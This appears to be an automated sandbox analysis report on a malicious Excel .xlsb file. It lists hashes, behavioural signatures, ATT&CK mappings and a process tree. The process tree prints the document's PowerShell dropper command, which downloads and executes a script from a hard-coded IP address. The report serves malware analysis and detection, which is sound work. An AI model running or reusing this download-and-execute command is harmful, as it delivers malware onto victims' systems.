Analysis

  • max time kernel
    117s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    20-04-2024 12:55

General

  • Target

    fccf9ac7d9db45ce6dae839ab0660a28_JaffaCakes118.xlsb

  • Size

    69KB

  • MD5

    fccf9ac7d9db45ce6dae839ab0660a28

  • SHA1

    ab408309380f26dac93fb1aa81e8da7035fff8be

  • SHA256

    968ed5f5fbf0b4666905b104eb77371942716fbfc2e240fc2c7eb4a99a9265c2

  • SHA512

    ac788fdce14ccca750ce98029218caafb79d7adc2df9adc62267ec8d26579c330261ec37db7b2fdac8b9e73723bb98d5e284f145e01d35b2d531a1ce955bede5

  • SSDEEP

    1536:29LKBLo0CLRyt7VrolmSb4wjE7zF0Rhdv1hQzMrTeLAD:2dw9Cd1Lb4GE0DrTekD

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://54.202.26.55/oo

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\fccf9ac7d9db45ce6dae839ab0660a28_JaffaCakes118.xlsb
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2760
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c powershell -ep b IEX (New-Object Net.WebClient).DownloadString('http://54.202.26.55/oo')
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -ep b IEX (New-Object Net.WebClient).DownloadString('http://54.202.26.55/oo')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2852

Network

MITRE ATT&CK Matrix ATT&CK v13

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2760-8-0x0000000072A9D000-0x0000000072AA8000-memory.dmp
    Filesize

    44KB

  • memory/2760-1-0x0000000072A9D000-0x0000000072AA8000-memory.dmp
    Filesize

    44KB

  • memory/2760-16-0x0000000072A9D000-0x0000000072AA8000-memory.dmp
    Filesize

    44KB

  • memory/2760-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2760-15-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2852-5-0x000000006C600000-0x000000006CBAB000-memory.dmp
    Filesize

    5.7MB

  • memory/2852-7-0x0000000002640000-0x0000000002680000-memory.dmp
    Filesize

    256KB

  • memory/2852-9-0x000000006C600000-0x000000006CBAB000-memory.dmp
    Filesize

    5.7MB

  • memory/2852-10-0x0000000002640000-0x0000000002680000-memory.dmp
    Filesize

    256KB

  • memory/2852-11-0x0000000002640000-0x0000000002680000-memory.dmp
    Filesize

    256KB

  • memory/2852-12-0x000000006C600000-0x000000006CBAB000-memory.dmp
    Filesize

    5.7MB

  • memory/2852-6-0x0000000002640000-0x0000000002680000-memory.dmp
    Filesize

    256KB

  • memory/2852-4-0x000000006C600000-0x000000006CBAB000-memory.dmp
    Filesize

    5.7MB